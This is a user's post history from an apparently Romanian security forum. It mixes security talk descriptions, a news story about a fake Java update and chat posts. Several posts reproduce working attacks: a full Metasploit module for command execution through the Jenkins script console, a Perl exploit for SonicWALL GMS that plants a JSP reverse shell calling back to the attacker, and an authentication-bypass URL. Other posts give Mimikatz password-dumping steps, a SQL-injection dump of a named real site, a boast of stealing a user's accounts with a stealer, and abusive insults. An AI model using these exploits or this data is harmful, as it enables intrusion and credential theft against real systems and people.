Jump to content

Praetorian503

Active Members
  • Posts

    578
  • Joined

  • Last visited

  • Days Won

    5

Everything posted by Praetorian503

  1. Description: Nowadays, SAP Netweaver has become the most extensive platform for building enterprise applications and run critical business processes. In recent years it has become a hot topic in information security. However, while fixes and countermeasures are released monthly by SAP at an incredible rate, the available security knowledge is limited and some components are still not well covered. SAP Diag is the application-level protocol used for communications between SAP GUI and SAP Netweaver Application Servers and it's a core part of any ABAP-based SAP Netweaver installation. Therefore, if an attacker is able to compromise this component, this would result in a total takeover of a SAP system. In recent years, the Diag protocol has received some attention from the security community and several tools were released focused on decompression and sniffing. Nevertheless, protocol specification is not public and internal components and inner-workings remains unknown; the protocol was not understood and there is no publicly available tool for active exploitation of real attack vectors. This talk is about taking SAP penetration testing out of the shadows and shedding some light into SAP Diag, by introducing a novel way to uncover vulnerabilities in SAP software through a set of tools that allows analysis and manipulation of the SAP Diag protocol. In addition, we will show how these tools and the knowledge acquired while researching the protocol can be used for vulnerability research, fuzzing and practical exploitation of novel attack vectors involving both SAP's client and server applications: man-in-the-middle attacks, RFC calls injection, rogue SAP servers deployment, SAP GUI client-side attacks and more. As a final note, this presentation will also show how to harden your SAP installations and mitigate these threats. Martin Gallo is a Security Consultant at CORE Security, where he performs application and network penetration testing, conducts code reviews and identifies vulnerabilities in enterprise and third party software. His research interests include enterprise software security, vulnerability research and reverse engineering. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Uncovering Sap Vulnerabilities: Reversing And Breaking The Diag Protocol
  2. Description: Reconnaissance on a network has been an attacker's game for far too long, where's the defense? Nmap routinely evades firewalls, traverses NATs, bypasses signature based NIDS, and gathers up the details of your highly vulnerable box serving Top Secret documents. Why make it so easy? In this talk, we will explore how to prevent network reconnaissance by using honeyd to flood your network with low fidelity honeypots. We then discuss how this lets us constrain the problem of detecting reconnaissance such that a machine learning algorithm can be effectively applied. (No signatures!) We will also discuss some important additions to honeyd that we had to make along the way, and perform a live demonstration of our free software tool for doing all of the above: Nova. Dan "AltF4" Petro: By day, Alt is a security researcher for DataSoft Corp, a small business in Scottsdale Arizona, where he focuses on developing open source tools for network security. He holds a M.S. in Information Assurance from Arizona State University where he studied network security and cryptographic protocols. By night, he is a rogue free software and privacy activist with a penchant for the dramatic. He is a lifelong hacker and regular member of the Phoenix 2600. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Network Anti-Reconnaissance: Messing With Nmap Through Smoke And Mirrors
  3. Cine crezi ca mai cade in scam in ziua de azi?! Sau mai bine zis, cine crezi ca iti va cadea tie in scam?! Am mai multa incredere in cel de aici
  4. This Metasploit module uses the Jenkins Groovy script console to execute OS commands using Java. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerVBS def initialize(info = {}) super(update_info(info, 'Name' => 'Jenkins Script-Console Java Execution', 'Description' => %q{ This module uses the Jenkins Groovy script console to execute OS commands using Java. }, 'Author' => [ 'Spencer McIntyre', 'jamcut' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: $', 'DefaultOptions' => { 'WfsDelay' => '10', }, 'References' => [ ['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console'] ], 'Targets' => [ ['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win'}], ['Unix', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}], ], 'DisclosureDate' => 'Jan 18 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]), OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]), OptString.new('PATH', [ true, 'The path to jenkins', '/jenkins' ]), ], self.class) end def check res = send_request_cgi({'uri' => "#{datastore['PATH']}/login"}) if res and res.headers.include?('X-Jenkins') return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def http_send_command(cmd, opts = {}) res = send_request_cgi({ 'method' => 'POST', 'uri' => datastore['PATH'] + '/script', 'cookie' => @cookie, 'vars_post' => { 'script' => java_craft_runtime_exec(cmd), 'Submit' => 'Run' } }) if not (res and res.code == 200) fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.') end end def java_craft_runtime_exec(cmd) decoder = Rex::Text.rand_text_alpha(5, 8) decoded_bytes = Rex::Text.rand_text_alpha(5, 8) cmd_array = Rex::Text.rand_text_alpha(5, 8) jcode = "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n" jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n" jcode << "String [] #{cmd_array} = new String[3];\n" if target['Platform'] == 'win' jcode << "#{cmd_array}[0] = \"cmd.exe\";\n" jcode << "#{cmd_array}[1] = \"/c\";\n" else jcode << "#{cmd_array}[0] = \"/bin/sh\";\n" jcode << "#{cmd_array}[1] = \"-c\";\n" end jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n" jcode << "Runtime.getRuntime().exec(#{cmd_array});\n" jcode end def execute_command(cmd, opts = {}) http_send_command("#{cmd}") end def exploit print_status('Checking access to the script console') res = send_request_cgi({'uri' => "#{datastore['PATH']}/script"}) if not (res and res.code) fail_with(Exploit::Failure::Unknown) end sessionid = 'JSESSIONID=' << res.headers['set-cookie'].split('JSESSIONID=')[1].split('; ')[0] @cookie = "#{sessionid}" if res.code != 200 print_status('Logging in...') res = send_request_cgi({ 'method' => 'POST', 'uri' => datastore['PATH'] + '/j_acegi_security_check', 'cookie' => @cookie, 'vars_post' => { 'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'), 'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'), 'Submit' => 'log in' } }) if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/ fail_with(Exploit::Failure::NoAccess, 'login failed') end else print_status('No authentication required, skipping login...') end case target['Platform'] when 'win' print_status("#{rhost}:#{rport} - Sending VBS stager...") execute_cmdstager({:linemax => 2049}) when 'unix' print_status("#{rhost}:#{rport} - Sending payload...") http_send_command("#{payload.encoded}") end handler end end Source: PacketStorm
  5. Description: Desbordamiento de buffer al procesar el parametro "host" al producirse algún ALERT de servicio o de host dentro del historico Buffer overflow when processing the parameter "host" to occur some ALERT of service or host into the historic Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Nagios 3 History.Cgi Host Command Execution By @Japtron
  6. By John Leyden • Get more from this author Posted in Security, 18th January 2013 12:32 GMT Cybercrooks have begun distributing an item of malware that poses as a Java security update. Oracle released a new version of Java 7 (Java 7u11) on Sunday (13 January) to addresses zero-day vulnerability that has been exploited in the wild. The update was important because the underlying exploit had been "weaponised" and bundled in widely available black market exploit kits in the week prior to Oracle's security update. The security flap generated plenty of attention, especially after US CERT warned that despite the update it remained a bad idea to run Java plugins in browsers. Cybercrooks have latched onto this publicity by pushing out a fake Java security update, net security firm Trend Micro warns. The fake updater actually opens a backdoor onto Windows systems, providing users download and apply it. "Though the dropped malware does not exploit CVE-2012-3174 or any Java-related vulnerability, the bad guys behind this threat is clearly piggybacking on the Java zero-day incident and users' fears," said Paul Pajares, fraud analyst at Trend Micro in a blog post. "The use of fake software updates is an old social engineering tactic." Trend advises users to obtain their Java security updates directly from Oracle rather than from third-party websites. Earlier this week ads for a Java exploit that supposedly attacks a brand-new vulnerability were offered for sale through an underground hacking forum at $5,000 a pop. The ad has since been pulled. Although the claim from cybercrooks that they have discovered yet another unpatched Java security hole remains unsubstantiated, the potential threat is all too credible. Metasploit founder HD Moore reckons that Oracle is sitting on a backlog of Java flaws that will take up to two years to patch, even without the appearance of further problems. "The 'two-year' comment was based on the types of problems that have been found in Java over the last 12 months, namely sandbox escapes [achieved] by abusing reflection APIs," Moore explained in an email to El Reg. "These types of flaws are difficult to find and sometimes even harder to fix. Oracle has already spent a year working through these issues based on the initial Security Explorations report, but will likely need another two years to fix them completely." Separately Trend Micro warned earlier this week that the latest Java security update may be incomplete. The update attempts to address two security bugs but fails to quash one of these completely. The security firm advises users to avoid Java where possible, particularly as a plugin to their browsers, where the main danger arises. Users obliged to use Java, perhaps on the small percentage of sites which require it or for work-related reasons, can minimise their exposure by disabling Java on their main day-to-day browser and using a secondary browser with an enabled Java plugin solely for those sites. This tactic for minimising exposure to Java-based attacks is advocated by many security firms. Source: VXers exploit users' confusion over Java to punt fake update • The Register
  7. SonicWALL GMS/VIEWPOINT version 6.x and Analyzer version 7.x remote root/SYSTEM exploit. #!/usr/bin/perl ## # Title: SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit # Name: sgmsRCE.pl # Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de> # # Use it only for education or ethical pentesting! The author accepts # no liability for damage caused by this tool. # ## use strict; use HTTP::Request::Common qw(POST); use LWP::UserAgent; use LWP::Protocol::https; use Getopt::Std; my %args; getopt('hlp:', \%args); my $victim = $args{h} || usage(); my $lip = $args{l}; my $lport = $args{p}; my $detect = $args{d}; my $shellname = "cbs.jsp"; banner(); my $gms_path; my $target; my $sysshell; my $agent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0,},); $agent->agent("Mozilla/5.0 (X11; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0"); # Place your Proxy here if needed #$agent->proxy(['http', 'https'], 'http://localhost:8080/'); print "[+] Checking host ...\n"; my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1", Content_Type => 'application/x-www-form-urlencoded; charset=UTF-8', Content => [ num => "123456", action => "show_diagnostics", task => "search", item => "application_log", criteria => "*.*", width => "500", ]; my $result = $agent->request($request); if ($result->is_success) { print "[+] Host looks vulnerable ...\n"; } else { print "[-] Error while connecting ... $result->status_line\n"; exit(0); } my @lines=split("\n",$result->content); foreach my $line (@lines) { if ($line =~ /OPTION VALUE=/) { my @a=split("\"", $line); if ($a[1] =~ m/logs/i) { my @b=split(/logs/i,$a[1]); $gms_path=$b[0]; } if ($gms_path ne "") { print "[+] GMS Path: $gms_path\n"; last; } else { next; } } } if ($gms_path eq "") { print "[-] Couldn't get the GMS path ... Maybe not vulnerable\n"; exit(0); } if ($gms_path =~ m/^\//) { $target="UNX"; $gms_path=$gms_path."Tomcat/webapps/appliance/"; $sysshell="/bin/sh"; print "[+] Target ist Unix...\n"; } else { $target="WIN"; $gms_path=$gms_path."Tomcat\\webapps\\appliance\\"; $sysshell="cmd.exe"; print "[+] Target ist Windows...\n"; } &_writing_shell; if (!$detect) { print "[+] Uploading shell ...\n"; my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1", Content_Type => 'multipart/form-data', Content => [ action => "file_system", task => "uploadFile", searchFolder => "$gms_path", uploadFileName => ["$shellname"] ]; my $result = $agent->request($request); if ($result->is_success) { print "[+] Upload completed ...\n"; } else { print "[-] Error while connecting ... $result->status_line\n"; exit(0); } unlink("$shellname"); print "[+] Spawning remote root/system shell ...\n"; my $result = $agent->get("$victim/appliance/$shellname"); if ($result->is_success) { print "[+] Have fun ...\n"; } else { print "[-] Error while connecting ... $result->status_line\n"; exit(0); } } sub _writing_shell { open FILE, ">", "$shellname" or die $!; print FILE << "EOF"; <%\@page import="java.lang.*"%> <%\@page import="java.util.*"%> <%\@page import="java.io.*"%> <%\@page import="java.net.*"%> <% class StreamConnector extends Thread { InputStream is; OutputStream os; StreamConnector( InputStream is, OutputStream os ) { this.is = is; this.os = os; } public void run() { BufferedReader in = null; BufferedWriter out = null; try { in = new BufferedReader( new InputStreamReader( this.is ) ); out = new BufferedWriter( new OutputStreamWriter( this.os ) ); char buffer[] = new char[8192]; int length; while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) { out.write( buffer, 0, length ); out.flush(); } } catch( Exception e ){} try { if( in != null ) in.close(); if( out != null ) out.close(); } catch( Exception e ){} } } try { Socket socket = new Socket( "$lip", $lport ); Process process = Runtime.getRuntime().exec( "$sysshell" ); ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); } catch( Exception e ) {} %> EOF close(FILE); } sub usage { print "\n"; print " $0 - SonicWALL GMS/VIEWPOINT/Analyzer Remote Root/SYSTEM exploit\n"; print "====================================================================\n\n"; print " Usage:\n"; print " $0 -h <http://victim> -l <yourip> -p <yourport>\n"; print " Notes:\n"; print " Start your netcat listener <nc -lp 4444>\n"; print " -d only checks if the Host is vulnerable\n"; print "\n"; print " Author:\n"; print " Nikolas Sotiriu (lofi)\n"; print " url: www.sotiriu.de\n"; print " mail: lofi[at]sotiriu.de\n"; print "\n"; exit(1); } sub banner { print STDERR << "EOF"; -------------------------------------------------------------------------------- SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit -------------------------------------------------------------------------------- EOF } Source: PacketStorm
  8. SonicWALL GMS/Viewpoint/Analyzer suffers from an authentication bypass vulnerability. ______________________________________________________________________ -------------------------- NSOADV-2013-002 --------------------------- SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/) ______________________________________________________________________ ______________________________________________________________________ 111101111 11111 00110 00110001111 111111 01 01 1 11111011111111 11111 0 11 01 0 11 1 1 111011001 11111111101 1 11 0110111 1 1111101111 1001 0 1 10 11 0 10 11 1111111 1 111 111001 111111111 0 10 1111 0 11 11 111111111 1 1101 10 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011 0111111110 0110 1110 1 0 11101111111111111011 11100 00 01111 0 10 1110 1 011111 1 111111111111111111111101 01 01110 0 10 111110 110 0 11101111111111111111101111101 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111 111110110 10 0111110 1 0 0 1111111111111111111111111 110 111 11111 1 1 111 1 10011 101111111111011111111 0 1100 111 10 110 101011110010 11111111111111111111111 11 0011100 11 10 001100 0001 111111111111111111 10 11 11110 11110 00100 00001 10 1 1111 101010001 11111111 11101 0 1011 10000 00100 11100 00001101 0 0110 111011011 0110 10001 101 11110 1011 1 10 101 000001 01 00 1010 1 11001 1 1 101 10 110101011 0 101 11110 110000011 111 ______________________________________________________________________ ______________________________________________________________________ Title: SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/) Severity: Critical CVE-ID: CVE-2013-1360 CVSS Base Score: 9 Impact: 8.5 Exploitability: 10 CVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C Advisory ID: NSOADV-2013-002 Found Date: 2012-04-26 Date Reported: 2012-12-13 Release Date: 2013-01-17 Author: Nikolas Sotiriu Website: http://sotiriu.de Twitter: http://twitter.com/nsoresearch Mail: nso-research at sotiriu.de URL: http://sotiriu.de/adv/NSOADV-2013-002.txt Vendor: DELL SonicWALL (http://www.sonicwall.com/) Affected Products: GMS Analyzer UMA ViewPoint Affected Platforms: Windows/Linux Affected Versions: GMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x GMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x Remote Exploitable: Yes Local Exploitable: No Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Background: =========== The SonicWALL® Global Management System (GMS) provides organizations, distributed enterprises and service providers with a powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam, backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware, or a virtual appliance, SonicWALL GMS offers centralized real-time monitoring, and comprehensive policy and compliance reporting. For enterprise customers, SonicWALL GMS streamlines security policy management and appliance deployment, minimizing administration overhead. Service Providers can use GMS to simplify the security management of multiple clients and create additional revenue opportunities. For added redundancy and scalability, GMS can be deployed in a cluster configuration. (Product description from Website) Description: ============ DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that allows an unauthenticated, remote attacker to bypass the Web interface authentication offered by the affected product. The vulnerability is attributed to a broken session handling in the process of password change process of the web application. changing in the web application. An attacker may exploit this vulnerability by sending a specially crafted request to the SGMS Interface (/sgms/). The attacker gains full administrative access to the interface and full control over all managed appliances, which could lead to a full compromisation of the organisation. Proof of Concept : ================== Access the following URL to login to the sgms interface: http://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663 83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092 4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000 00000000001 If the Console is not directly shown, type any password you want in the change password dialog twice and hit submit to login. Maybe you need to access the following URL after this process: http://host/sgms/auth Solution: ========= Install Hotfix 125076.77. (Download from www.mysonicwall.com) Disclosure Timeline: ==================== 2012-04-26: Vulnerability found 2012-12-12: Sent the notification and disclosure policy and asked for a PGP Key (security@sonicwall.com) 2012-12-13: Sent advisory, disclosure policy and planned disclosure date (2012-12-28) to vendor 2012-12-18: SonicWALL analyzed the finding and wishes to delay the release to the 3. calendar week 2013. 2012-12-18: Changed release date to 2013-01-17. 2012-12-20: Patch is published 2013-01-17: Release of this advisory Source: PacketStorm
  9. Description: In this video I will show you how to dump internet History from the memory using Volatility Framework Volatility is a very powerful framework for memory forensics and all features are awesome. In this demo I will show how to use Yarascan and iehistory pluging for History dump and you will get almost all the history with in and out time. For this Demo you need to use Latest Volatility Framework, I mean beta version. Save all output in a text file so it is easy to check all the urls. Downloads - volatility - An advanced memory forensics framework - Google Project Hosting Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Dump Internet Cache History And Urls Using Volatility Framework
  10. Description: In this video i will show you how to get Clear Text Password using Mimikatz. You need to download Mimikatz and upload it on a victim pc using meterpreter shell and you need to execute the mimikatz.exe and inject sekurlsa dll into lsass.exe then using some command you can get clear text password. This same process is working on Windows – 8. Download Mimikatz: - mimikatz | Blog de Gentil Kiwi Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Dumping Cleartext Password Using Mimikatz
  11. Eu nu imi cer scuze in fata nimanui. Pleaca in pula mea si tu si parerile tale ca ma pis pe tine.
  12. Fortele speciale in actiune! Mi-ar prinde bine o usa ca aia
  13. hahahhaha bine le face! Sa nu se mai umple tara de 'americani'!
  14. L-a virusat bine si acum il pune la ce categorie vrea el crezand ca il va lua lumea )
  15. Da. Pile, relatii, cunostiinte?!
  16. Va rog sa va abtineti de la hint-uri de data asta. Acest CH este pentru UnderMoloz:))
  17. Ce-ai Nytro? Ai chef de caterinca si nu stii de cine sa faci?Nu te inghit.
  18. [*]Target: http://www.aasbanat.ro [*]Version: 5.0.37-standard-log [*]Database: aasbanat_myDatabase [*]User: aasbanat_myUser@localhost [*]DataDir: /var/lib/mysql/ [*]BaseDir: / [*]VersionCompileOS: pc-linux-gnu [*]TmpDir: /tmp/ [*]Tables: anunturi_utile membrii resurse [*]Columns: id titlu data_start data_stop descriere titlu_link link id prenume nume functie institutie email descriere id tip titlu_link link [*]Report: Vulnerability reported! Praetorian, Hackyard Security Group!
  19. [*]Target: http://zerocoolhf.altervista.org/level2.php?id=1 [*]Requirements: Version & nickname. [*]Method: Union Based [*]Proof: [table=width: 120, class: grid, align: left] [tr] [td] [*]Solvers [/td] [/tr] [tr] [td]SelfDestruct[/td] [/tr] [tr] [td]XoddX[/td] [/tr] [tr] [td]Sweby[/td] [/tr] [tr] [td]StoNe-[/td] [/tr] [tr] [td]alecseu[/td] [/tr] [tr] [td]ajkaro[/td] [/tr] [tr] [td]311733[/td] [/tr] [tr] [td]-[/td] [/tr] [tr] [td]-[/td] [/tr] [/table]
  20. Nustiu deci cateva chestii ar cam trebuii modificate. 1. Recent Posts mi-ar place mai mult in dreapta acolo. 2. Like US mi se pare in plus. 3. Butoanele trebuiesc facute mai mici si scoasa chestia aia 'Share this' pentru ca o ai si pe buton.
  21. Nu incerca sa pari interesant. Pulifrici, te cunosc foarte bine la fel si cunostiintele tale care sunt 0. Cat ai stat pe langa mine ai invatat putin SQLi si chiar am fost baiat si ti-am dat niste sintaxe(rezolvate ca sa stie lumea)ca sa poti posta in niste challenge-uri, dar vad ca esti nerecunoscator si faci pe destepul cu mine. Si nu imi mai cere hint-uri la toate ch easy ca deja devii penibil. Esti atat de prost incat mi-ai cazut si in stealer tine minte ca am avut acces la toate conturile tale dar am fost baiat si ti-am sters doar conturile de y!m. Eu personal, Praetorian, din baza de date MySQL, din tabelul users, te salut!
×
×
  • Create New...